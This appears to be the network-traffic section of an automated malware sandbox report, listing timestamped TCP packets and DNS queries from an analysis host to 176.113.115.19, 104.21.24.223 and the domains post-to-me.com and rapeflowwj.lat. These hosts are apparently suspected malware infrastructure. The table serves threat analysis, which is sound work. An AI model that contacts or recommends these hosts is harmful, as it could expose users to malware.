Dec 18, 2024 21:09:53.164804935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.164850950 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.166457891 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.166531086 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.166572094 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.166650057 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.168396950 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.168493986 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.168494940 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.168551922 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.170309067 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.170413971 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.170418024 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.170542955 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.172112942 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.172208071 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.172224045 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.172296047 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.173949003 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.174001932 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.174063921 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.174252033 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.175820112 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.175883055 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.175925016 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.175982952 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.177695036 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.177747011 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.177781105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.177850008 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.179554939 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.179613113 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.179701090 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.179800987 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.181356907 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.181462049 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.181509972 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.181509972 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.183228016 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.183306932 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.183346987 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.183417082 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.185084105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.185200930 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.185240030 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.185256958 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.186939001 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.187012911 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.187086105 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.187225103 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.188827991 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.188915014 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.188952923 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.189013004 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.191020012 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.191073895 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.191122055 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.191274881 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.192585945 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.192707062 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.192747116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.192791939 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.194464922 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.194525003 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.194551945 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.194650888 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.196297884 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.196363926 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.196419001 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.196470976 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.198302031 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.198355913 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.198395967 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.198512077 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.200021982 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.200113058 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.200150013 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.200206041 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.201896906 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.201992035 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.202048063 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.202104092 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.203773975 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.203836918 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.203840017 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.203891993 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.205604076 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.205745935 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.205751896 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.205822945 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.207509995 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.207628965 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.207636118 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.207712889 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.209424973 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.209485054 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.209491968 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.209614992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.211251974 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.211308956 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.211396933 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.211462021 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.213042974 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.213184118 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.213188887 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.213238955 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.214905024 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.214982986 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.215043068 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.215106964 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.216876984 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.216942072 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.313014030 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.313222885 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.313257933 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.313343048 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.313741922 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.314022064 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.314105034 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.314240932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.314284086 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.314284086 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.315625906 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.315696001 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.315735102 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.315735102 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.317104101 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.317271948 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.317322016 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.317322016 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.318730116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.318855047 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.318900108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.318900108 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.320174932 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.320317030 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.320322990 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.320492029 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.321638107 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.321738958 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.321757078 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.321862936 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.323187113 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.323268890 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.323378086 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.323463917 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.324645042 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.324743032 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.324815035 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.324862957 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.326085091 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.326136112 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.326296091 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.326343060 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.327492952 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.327545881 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.327575922 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.327634096 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.328851938 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.328979015 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.329024076 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.329024076 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.330312014 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.330426931 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.330471992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.330471992 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.331698895 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.331767082 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.331788063 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.332020998 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.333089113 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.333143950 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.333189011 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.333318949 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.334436893 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.334491014 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.334537983 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.334580898 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.335835934 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.335928917 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.335963964 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.336004972 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.337091923 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.337142944 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.337210894 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.337256908 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.338524103 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.338650942 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.338651896 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.338922024 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.339787006 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.339903116 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.339942932 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.339942932 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.341164112 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.341260910 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.341310024 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.341310024 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:53.342456102 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:53.342515945 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:55.502275944 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:55.502368927 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:55.502465963 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:55.503597975 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:55.503633976 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:56.724919081 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:56.725003958 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:56.728038073 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:56.728055000 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:56.728611946 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:56.772914886 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:56.772967100 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:56.773047924 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:57.439264059 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:57.439353943 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:57.439537048 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:57.441610098 CET	49732	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:57.441636086 CET	443	49732	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:57.449815989 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:57.449851990 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:57.449924946 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:57.450213909 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:57.450226068 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:57.718803883 CET	80	49731	176.113.115.19	192.168.2.4
Dec 18, 2024 21:09:57.718885899 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:09:58.668375969 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:58.668649912 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:58.687299967 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:58.687331915 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:58.687772036 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:58.744908094 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:58.756840944 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:58.756869078 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:58.756992102 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.595983028 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.596052885 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.596098900 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.596117020 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.596503973 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.596540928 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.596550941 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.596558094 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.596606016 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.604187012 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.612706900 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.612754107 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.612761974 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.621355057 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.621417999 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.621428013 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.666852951 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.666863918 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.713634014 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.787939072 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.791688919 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.791810989 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.791858912 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.791858912 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.791872025 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.791908026 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.791986942 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.792036057 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.792665005 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.792684078 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.792707920 CET	49733	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.792714119 CET	443	49733	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.961946011 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.961998940 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:09:59.962078094 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.962353945 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:09:59.962371111 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:01.401643038 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:01.401906013 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:01.445326090 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:01.445350885 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:01.446294069 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:01.448343992 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:01.448471069 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:01.448523998 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:01.448585987 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:01.448596001 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:02.320486069 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:02.320719957 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:02.320785999 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:02.320828915 CET	49734	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:02.320847988 CET	443	49734	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:02.598357916 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:02.598407984 CET	443	49735	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:02.598489046 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:02.598999023 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:02.599011898 CET	443	49735	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:03.816836119 CET	443	49735	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:03.816941023 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:03.844062090 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:03.844090939 CET	443	49735	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:03.844491959 CET	443	49735	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:03.846743107 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:03.846904039 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:03.846951962 CET	443	49735	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:04.889328957 CET	443	49735	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:04.889542103 CET	443	49735	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:04.889628887 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:04.889697075 CET	49735	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:05.284238100 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:05.284281969 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:05.284404993 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:05.284878969 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:05.284904957 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:06.504535913 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:06.504621983 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:06.505811930 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:06.505822897 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:06.506124020 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:06.507241011 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:06.507373095 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:06.507402897 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:06.507500887 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:06.507508039 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:08.703135967 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:08.703232050 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:10:08.703344107 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:08.703382969 CET	49738	443	192.168.2.4	104.21.24.223
Dec 18, 2024 21:10:08.703402042 CET	443	49738	104.21.24.223	192.168.2.4
Dec 18, 2024 21:11:38.214401960 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:11:38.526277065 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:11:39.136313915 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:11:40.354402065 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:11:42.776307106 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:11:47.620098114 CET	49731	80	192.168.2.4	176.113.115.19
Dec 18, 2024 21:11:57.292119026 CET	49731	80	192.168.2.4	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 18, 2024 21:09:48.242079020 CET	53643	53	192.168.2.4	1.1.1.1
Dec 18, 2024 21:09:48.389765978 CET	53	53643	1.1.1.1	192.168.2.4
Dec 18, 2024 21:09:55.352230072 CET	50223	53	192.168.2.4	1.1.1.1
Dec 18, 2024 21:09:55.494828939 CET	53	50223	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 18, 2024 21:09:48.242079020 CET	192.168.2.4	1.1.1.1	0x899	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Dec 18, 2024 21:09:55.352230072 CET	192.168.2.4	1.1.1.1	0xe964	Standard query (0)	rapeflowwj.lat	A (IP address)	IN (0x0001)	false

DNS Answers

